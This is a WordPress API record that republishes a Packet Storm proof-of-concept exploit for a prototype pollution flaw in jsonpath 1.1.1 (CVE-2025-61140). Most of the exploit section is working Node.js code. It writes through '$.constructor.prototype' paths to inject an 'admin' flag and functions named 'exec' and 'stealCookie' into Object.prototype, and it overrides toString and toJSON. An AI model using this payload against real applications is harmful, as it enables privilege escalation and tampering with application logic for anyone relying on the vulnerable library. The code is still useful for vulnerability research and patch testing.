{"id":40109,"date":"2026-02-10T13:49:51","date_gmt":"2026-02-10T13:49:51","guid":{"rendered":"http:\/\/localhost\/?p=40109"},"modified":"2026-02-10T13:49:51","modified_gmt":"2026-02-10T13:49:51","slug":"jsonpath-111-prototype-pollution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=40109","title":{"rendered":"\ud83d\udcc4 jsonpath 1.1.1 Prototype Pollution_PACKETSTORM:215222"},"content":{"rendered":"

{“lastseen”:”2026-02-10T19:07:10″,”description”:”Proof of concept exploit for a prototype pollution vulnerability in jsonpath version 1.1.1, where unsafe writes to $.constructor.prototype allows attackers to inject arbitrary properties and functions into Object.prototype. By abusing jsonpath.value,…”,”published”:”2026-02-10T00:00:00″,”modified”:”2026-02-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 jsonpath 1.1.1 Prototype Pollution”,”source”:””,”references”:””,”id”:”PACKETSTORM:215222″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-61140″],”sourceData”:”=============================================================================================================================================\\n | # Title : jsonpath 1.1.1 Prototype Pollution via constructor.prototype Assignment |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.3 (64 bits) |\\n | # Vendor : https:\/\/www.redhat.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/215071\/ \\u0026 \\tCVE-2025-61140\\n \\n [+] Summary : a prototype pollution vulnerability in jsonpath v1.1.1, where unsafe writes to $.constructor.prototype allow attackers to inject arbitrary properties and functions into Object.prototype. \\n By abusing jsonpath.value, an attacker can globally modify object behavior\u2014adding flags (e.g., admin), overriding core methods (toString, toJSON), and impacting arrays and strings through \\n \\t\\t\\t\\t the shared prototype chain. The PoC runs in Node.js and shows how a vulnerable application that accepts user\u2011controlled JSONPath expressions can be compromised, \\n \\t\\t\\t\\t leading to privilege escalation and logic manipulation across the entire runtime.\\n Unvalidated writes to constructor.prototype enable global state corruption\u2014making prototype pollution a high\u2011impact risk even without direct code execution.\\n \\n [+] POC : \\n \\n const jsonpath = require(‘jsonpath’);\\n \\n console.log(\\”=== Prototype Pollution PoC By indoushka(jsonpath 1.1.1) ===\\\\n\\”);\\n console.log(\\”1. Basic Test:\\”);\\n console.log(\\”Before:\\”, ({}).polluted); \/\/ undefined\\n jsonpath.value({}, ‘$.constructor.prototype.polluted’, \\”Yes, polluted\\”);\\n jsonpath.value({}, ‘$.constructor.prototype.isHacked’, true);\\n jsonpath.value({}, ‘$.constructor.prototype.hacker’, \\”attacker\\”);\\n \\n console.log(\\”After polluted:\\”, ({}).polluted);\\n console.log(\\”After isHacked:\\”, ({}).isHacked);\\n console.log(\\”After hacker:\\”, ({}).hacker);\\n console.log(\\”\\\\n2. Function Injection:\\”);\\n \\n jsonpath.value({}, ‘$.constructor.prototype.exec’, function (cmd) {\\n return `[MOCK EXEC] ${cmd}`;\\n });\\n \\n jsonpath.value({}, ‘$.constructor.prototype.stealCookie’, function () {\\n return \\”Node.js environment \u2013 no cookies\\”;\\n });\\n \\n const o = {};\\n console.log(o.exec(\\”whoami\\”));\\n console.log(o.stealCookie());\\n console.log(\\”\\\\n3. Behavior Modification:\\”);\\n \\n const originalToString = Object.prototype.toString;\\n const originalToJSON = Object.prototype.toJSON;\\n \\n jsonpath.value({}, ‘$.constructor.prototype.toString’, function () {\\n return \\”[Object HACKED]\\”;\\n });\\n \\n jsonpath.value({}, ‘$.constructor.prototype.toJSON’, function () {\\n return { hacked: true };\\n });\\n \\n const test = { a: 1 };\\n console.log(\\”toString:\\”, test.toString());\\n console.log(\\”JSON:\\”, JSON.stringify(test));\\n console.log(\\”\\\\n4. Other Types:\\”);\\n const arr = [1, 2, 3];\\n console.log(\\”Array polluted:\\”, arr.polluted);\\n const str = \\”hello\\”;\\n console.log(\\”String polluted:\\”, str.polluted);\\n console.log(\\”\\\\n5. Practical Scenario:\\”);\\n \\n function vulnerableApplication(path, value) {\\n jsonpath.value({}, path, value);\\n }\\n \\n console.log(\\”Before admin:\\”, ({}).admin);\\n \\n vulnerableApplication(\\n ‘$.constructor.prototype.admin’,\\n true\\n );\\n \\n console.log(\\”After admin:\\”, ({}).admin);\\n console.log(\\”\\\\n6. Cleanup:\\”);\\n \\n delete Object.prototype.polluted;\\n delete Object.prototype.isHacked;\\n delete Object.prototype.hacker;\\n delete Object.prototype.exec;\\n delete Object.prototype.stealCookie;\\n delete Object.prototype.admin;\\n \\n Object.prototype.toString = originalToString;\\n Object.prototype.toJSON = originalToJSON;\\n \\n console.log(\\”After cleanup polluted:\\”, ({}).polluted);\\n console.log(\\”After cleanup admin:\\”, ({}).admin);\\n \\n Greetings to :======================================================================\\n jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\\n ====================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215222″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215222\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-10T19:07:10″,”description”:”Proof of concept exploit for a prototype pollution vulnerability in jsonpath version 1.1.1, where unsafe writes to $.constructor.prototype allows attackers to inject arbitrary properties and…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-40109","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 jsonpath 1.1.1 Prototype Pollution_PACKETSTORM:215222 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=40109\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 jsonpath 1.1.1 Prototype Pollution_PACKETSTORM:215222 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-10T19:07:10″,”description”:”Proof of concept exploit for a prototype pollution vulnerability in jsonpath version 1.1.1, where unsafe writes to $.constructor.prototype allows attackers to inject arbitrary properties and...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=40109\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-10T13:49:51+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40109#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40109\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 jsonpath 1.1.1 Prototype Pollution_PACKETSTORM:215222\",\"datePublished\":\"2026-02-10T13:49:51+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40109\"},\"wordCount\":649,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40109#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40109\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40109\",\"name\":\"\ud83d\udcc4 jsonpath 1.1.1 Prototype Pollution_PACKETSTORM:215222 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-10T13:49:51+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40109#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40109\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40109#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 jsonpath 1.1.1 Prototype Pollution_PACKETSTORM:215222\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 jsonpath 1.1.1 Prototype Pollution_PACKETSTORM:215222 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=40109","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 jsonpath 1.1.1 Prototype Pollution_PACKETSTORM:215222 - zero redgem","og_description":"{“lastseen”:”2026-02-10T19:07:10″,”description”:”Proof of concept exploit for a prototype pollution vulnerability in jsonpath version 1.1.1, where unsafe writes to $.constructor.prototype allows attackers to inject arbitrary properties and...","og_url":"https:\/\/zero.redgem.net\/?p=40109","og_site_name":"zero redgem","article_published_time":"2026-02-10T13:49:51+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=40109#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=40109"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 jsonpath 1.1.1 Prototype Pollution_PACKETSTORM:215222","datePublished":"2026-02-10T13:49:51+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=40109"},"wordCount":649,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=40109#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=40109","url":"https:\/\/zero.redgem.net\/?p=40109","name":"\ud83d\udcc4 jsonpath 1.1.1 Prototype Pollution_PACKETSTORM:215222 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-10T13:49:51+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=40109#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=40109"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=40109#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 jsonpath 1.1.1 Prototype Pollution_PACKETSTORM:215222"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40109","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=40109"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40109\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=40109"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=40109"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=40109"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}